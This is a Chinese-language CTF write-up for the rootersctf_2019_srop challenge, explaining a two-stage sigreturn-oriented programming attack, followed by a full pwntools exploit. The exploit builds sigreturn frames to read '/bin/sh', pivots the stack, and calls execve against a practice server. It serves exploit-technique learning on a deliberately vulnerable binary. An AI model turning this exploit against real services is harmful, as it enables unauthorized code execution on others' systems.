rootersctf_2019_srop(srop)
看到题目十分明显的srop
题目的例行检查我就不放了
程序的逻辑也比较简单，需要注意的是这个题的二进制里没有 /bin/sh 字符串，所以我们需要两次 srop。
第一次 srop 调用 read 把 "/bin/sh\x00" 和第二段 payload 写到一个固定的可写地址（0x402000），再借助 syscall; leave; ret 把栈迁移到那里；第二次 srop 调用 execve("/bin/sh", 0, 0) 拿到 shell。
SROP - CTF Wiki (ctf-wiki.org)
完整exp如下
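"""Two-stage SROP exploit for rootersctf_2019_srop.

The binary contains no "/bin/sh" string, so one sigreturn is not enough:

  stage 1: sigreturn -> read(0, DATA_ADDR, STAGE2_READ_LEN) drops "/bin/sh\0"
           plus the stage-2 chain at a fixed address, then ``leave; ret``
           pivots the stack onto it;
  stage 2: sigreturn -> execve(DATA_ADDR, 0, 0).

Run ``python3 exp.py LOCAL`` to attack the local binary; anything else
targets the remote instance.  All addresses are specific to this build
(fixed 0x40xxxx addresses, i.e. the binary is not position independent).
"""
from pwn import *

context.arch = "amd64"

REMOTE_HOST = "node4.buuoj.cn"
REMOTE_PORT = 27052
BINARY = "./rootersctf_2019_srop"

# Fixed address that stage 1 reads into; it doubles as the "/bin/sh" buffer
# and as the stage-2 stack, so it must be writable in the target mapping.
DATA_ADDR = 0x402000

# Gadgets (absolute addresses in the non-PIE binary).
SYSCALL_LEAVE_RET = 0x401033          # syscall ; leave ; ret
POP_RAX_SYSCALL_LEAVE_RET = 0x401032  # pop rax ; syscall ; leave ; ret
SYSCALL_ADDR = 0x401046               # a bare syscall used for the final execve

# Distance from the start of the overflowed buffer to the saved return address.
RET_OFFSET = 0x88
# Length requested from read() in stage 1; comfortably covers the stage-2
# payload ("/bin/sh\0" + 0x20 filler + 2 qwords + one sigreturn frame).
STAGE2_READ_LEN = 0x400

SYS_READ = 0
SYS_RT_SIGRETURN = 0xF
SYS_EXECVE = 59


def build_read_frame() -> SigreturnFrame:
    """Return the stage-1 frame: read(0, DATA_ADDR, STAGE2_READ_LEN) then pivot.

    rip is the ``syscall; leave; ret`` gadget and rbp is DATA_ADDR+0x20, so
    once the read returns ``leave`` leaves rsp = DATA_ADDR+0x28 and ``ret``
    pops the first stage-2 gadget from exactly that offset.
    """
    frame = SigreturnFrame(kernel="amd64")
    frame.rax = SYS_READ
    frame.rdi = 0                 # fd 0: stdin
    frame.rsi = DATA_ADDR         # destination buffer
    frame.rdx = STAGE2_READ_LEN
    frame.rip = SYSCALL_LEAVE_RET
    frame.rbp = DATA_ADDR + 0x20  # pivot target: rsp = rbp + 8 after `leave`
    return frame


def build_execve_frame() -> SigreturnFrame:
    """Return the stage-2 frame: execve(DATA_ADDR, NULL, NULL)."""
    frame = SigreturnFrame(kernel="amd64")
    frame.rax = SYS_EXECVE
    frame.rdi = DATA_ADDR  # "/bin/sh\0" written there by stage 1
    frame.rsi = 0          # argv = NULL
    frame.rdx = 0          # envp = NULL
    frame.rip = SYSCALL_ADDR
    return frame


def stage1_payload() -> bytes:
    """Return the overflow: padding, ``pop rax`` with 15 (rt_sigreturn), frame."""
    return flat([
        b"a" * RET_OFFSET,
        POP_RAX_SYSCALL_LEAVE_RET,
        SYS_RT_SIGRETURN,
        bytes(build_read_frame()),
    ])


def stage2_payload() -> bytes:
    """Return the data that stage 1 reads into DATA_ADDR.

    Layout relative to DATA_ADDR:
      +0x00  "/bin/sh\\0"      (execve path)
      +0x08  0x20 filler       (the qword at +0x20 becomes rbp after `leave`)
      +0x28  pop rax gadget    (where stage 1's `ret` lands)
      +0x30  15                (rt_sigreturn)
      +0x38  execve sigreturn frame
    """
    return flat([
        b"/bin/sh\x00",
        b"a" * 0x20,
        POP_RAX_SYSCALL_LEAVE_RET,
        SYS_RT_SIGRETURN,
        bytes(build_execve_frame()),
    ])


def main() -> None:
    """Connect, deliver both stages and hand the shell to the user."""
    io = process(BINARY) if args.LOCAL else remote(REMOTE_HOST, REMOTE_PORT)
    # Debug aid: break right after the first syscall, before `leave`.
    # gdb.attach(io, "b *0x401035")
    io.recvline()  # consume the line the binary prints before its read
    # sendline() appends '\n'; both times it lands after the frame, where it
    # is harmless, provided the target's reads are large enough to take it.
    io.sendline(stage1_payload())
    io.sendline(stage2_payload())
    io.interactive()


if __name__ == "__main__":
    main()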